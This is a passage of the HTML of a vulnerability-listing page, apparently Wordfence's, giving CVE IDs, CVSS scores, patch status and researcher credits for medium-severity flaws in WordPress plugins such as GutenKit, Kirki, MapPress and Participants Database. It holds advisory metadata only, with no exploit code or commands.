<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff7d09d1-bbc7-417c-bb3c-30f9ffe49522" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dfe6b29f-421d-41f4-ab36-0fd48b1b8021" target="_blank" rel="noopener">Graphina – Charts and Graphs For Elementor &lt;= 3.1.12 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65529" target="_blank" rel="noopener noreferrer">							CVE-2026-65529						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/graphina-elementor-charts-and-graphs" target="_blank" rel="noopener">Graphina – Charts and Graphs For Elementor</a> <span class="wfvr-software-slug">[graphina-elementor-charts-and-graphs]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dfe6b29f-421d-41f4-ab36-0fd48b1b8021" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7430594c-3a71-4b24-875b-014e03be868f" target="_blank" rel="noopener">GutenKit &lt;= 2.4.12 &#8211; Missing Authorization to Unauthenticated Sensitive Information Exposure via Mailchimp REST Endpoints</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15827" target="_blank" rel="noopener noreferrer">							CVE-2026-15827						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon" target="_blank" rel="noopener">GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor</a> <span class="wfvr-software-slug">[gutenkit-blocks-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/viet-anh-ngo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29493df1367bfd44a934c8b8f3bfcdf9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29493df1367bfd44a934c8b8f3bfcdf9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/viet-anh-ngo" target="_blank" rel="noopener">Viet Anh Ngo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7430594c-3a71-4b24-875b-014e03be868f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/157847ac-f893-47fb-9e26-697f0ec124f0" target="_blank" rel="noopener">JetBooking &lt;= 4.1.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65468" target="_blank" rel="noopener noreferrer">							CVE-2026-65468						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-booking" target="_blank" rel="noopener">JetBooking</a> <span class="wfvr-software-slug">[jet-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/157847ac-f893-47fb-9e26-697f0ec124f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/84f65255-f710-44f9-9f77-61776a40abae" target="_blank" rel="noopener">Kirki &lt;= 6.0.14 &#8211; Insecure Direct Object Reference to Unauthenticated Sensitive Information Disclosure via &#8216;context&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13464" target="_blank" rel="noopener noreferrer">							CVE-2026-13464						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hurayraiit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b7aa8462cc66f5fa9c714bb2c045ad16.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b7aa8462cc66f5fa9c714bb2c045ad16"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hurayraiit" target="_blank" rel="noopener">Abu Hurayra (HurayraIIT)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/84f65255-f710-44f9-9f77-61776a40abae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49ff8aca-7f95-4cab-b031-3fda6d80a23b" target="_blank" rel="noopener">Kit (formerly ConvertKit) – Email Newsletter, Email Marketing, Membership, Subscribers and Landing Pages &lt;= 3.3.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65472" target="_blank" rel="noopener noreferrer">							CVE-2026-65472						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/convertkit" target="_blank" rel="noopener">Kit (formerly ConvertKit) – Email Newsletter, Email Marketing, Membership, Subscribers and Landing Pages</a> <span class="wfvr-software-slug">[convertkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49ff8aca-7f95-4cab-b031-3fda6d80a23b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6554a95c-13f9-4548-a062-fe9cd873d334" target="_blank" rel="noopener">Knit Pay – Cashfree, Instamojo, Razorpay, PayPal and more &lt;= 9.6.0.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57717" target="_blank" rel="noopener noreferrer">							CVE-2026-57717						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/knit-pay" target="_blank" rel="noopener">Knit Pay – Cashfree, Instamojo, Razorpay, PayPal and more</a> <span class="wfvr-software-slug">[knit-pay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f36c6f9e5c03ad8f37eb6faab59d90d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f36c6f9e5c03ad8f37eb6faab59d90d8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener">Riyas M S</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6554a95c-13f9-4548-a062-fe9cd873d334" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cb276a2-131b-4ce2-9968-2007ce9cdc93" target="_blank" rel="noopener">LA-Studio Element Kit for Elementor &lt;= 1.6.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65489" target="_blank" rel="noopener noreferrer">							CVE-2026-65489						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lastudio-element-kit" target="_blank" rel="noopener">LA-Studio Element Kit for Elementor</a> <span class="wfvr-software-slug">[lastudio-element-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/steven-julian" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/steven-julian" target="_blank" rel="noopener">Steven Julian</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cb276a2-131b-4ce2-9968-2007ce9cdc93" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/32dc0914-b5a3-49f2-86ed-3bc9de6cc974" target="_blank" rel="noopener">Manual &#8211; Documentation, Knowledge Base &amp; Education WordPress &lt;= 7.5.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65500" target="_blank" rel="noopener noreferrer">							CVE-2026-65500						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/manual" target="_blank" rel="noopener">Manual &#8211; Documentation, Knowledge Base &amp; Education WordPress Theme</a> <span class="wfvr-software-slug">[manual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed32dll" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed32dll" target="_blank" rel="noopener">ed32.dll</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/32dc0914-b5a3-49f2-86ed-3bc9de6cc974" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c50cf850-f890-4b14-8840-4cca3080e081" target="_blank" rel="noopener">MapPress – Google Maps, OpenStreetMap &amp; Leaflet &lt;= 2.97.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65564" target="_blank" rel="noopener noreferrer">							CVE-2026-65564						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mappress-google-maps-for-wordpress" target="_blank" rel="noopener">MapPress – Google Maps, OpenStreetMap &amp; Leaflet</a> <span class="wfvr-software-slug">[mappress-google-maps-for-wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c50cf850-f890-4b14-8840-4cca3080e081" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deba0ee8-1930-4287-aaaf-0d89a674934c" target="_blank" rel="noopener">MarketKing — Ultimate WooCommerce Multivendor Marketplace Solution &lt;= 2.1.40 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27399" target="_blank" rel="noopener noreferrer">							CVE-2026-27399						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/marketking-multivendor-marketplace-for-woocommerce" target="_blank" rel="noopener">MarketKing — Ultimate WooCommerce Multivendor Marketplace Solution</a> <span class="wfvr-software-slug">[marketking-multivendor-marketplace-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deba0ee8-1930-4287-aaaf-0d89a674934c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62a37eab-a278-4c6f-bc61-b9157c840cf0" target="_blank" rel="noopener">miniOrange Discord Integration &lt;= 2.2.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59545" target="_blank" rel="noopener noreferrer">							CVE-2026-59545						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-discord-integration" target="_blank" rel="noopener">miniOrange Discord Integration</a> <span class="wfvr-software-slug">[miniorange-discord-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/buitu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e4f30e00e8f8df13ae1201de04dee2a6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e4f30e00e8f8df13ae1201de04dee2a6"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/buitu" target="_blank" rel="noopener">buitu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62a37eab-a278-4c6f-bc61-b9157c840cf0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/082dd8b3-da2e-492c-9fc0-44a261df4ba4" target="_blank" rel="noopener">MP3 Audio Player – Music Player, Podcast Player &amp; Radio by Sonaar &lt;= 5.12 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65506" target="_blank" rel="noopener noreferrer">							CVE-2026-65506						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mp3-music-player-by-sonaar" target="_blank" rel="noopener">MP3 Audio Player – Music Player, Podcast Player &amp; Radio by Sonaar</a> <span class="wfvr-software-slug">[mp3-music-player-by-sonaar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/082dd8b3-da2e-492c-9fc0-44a261df4ba4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92a4bfab-6813-42c2-b1dd-f0b88c494e0f" target="_blank" rel="noopener">Ninja Tables – Easy Data Table Builder &lt;= 5.2.10 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65474" target="_blank" rel="noopener noreferrer">							CVE-2026-65474						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-tables" target="_blank" rel="noopener">Ninja Tables – Easy Data Table Builder</a> <span class="wfvr-software-slug">[ninja-tables]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92a4bfab-6813-42c2-b1dd-f0b88c494e0f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff1b8d09-974a-4735-8b63-15084412090d" target="_blank" rel="noopener">Participants Database &lt;= 2.7.8.3 &#8211; Missing Authorization to Unauthenticated Arbitrary Record Update / Sensitive Information Exposure via &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11354" target="_blank" rel="noopener noreferrer">							CVE-2026-11354						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/participants-database" target="_blank" rel="noopener">Participants Database</a> <span class="wfvr-software-slug">[participants-database]</span></div>
</p></div>
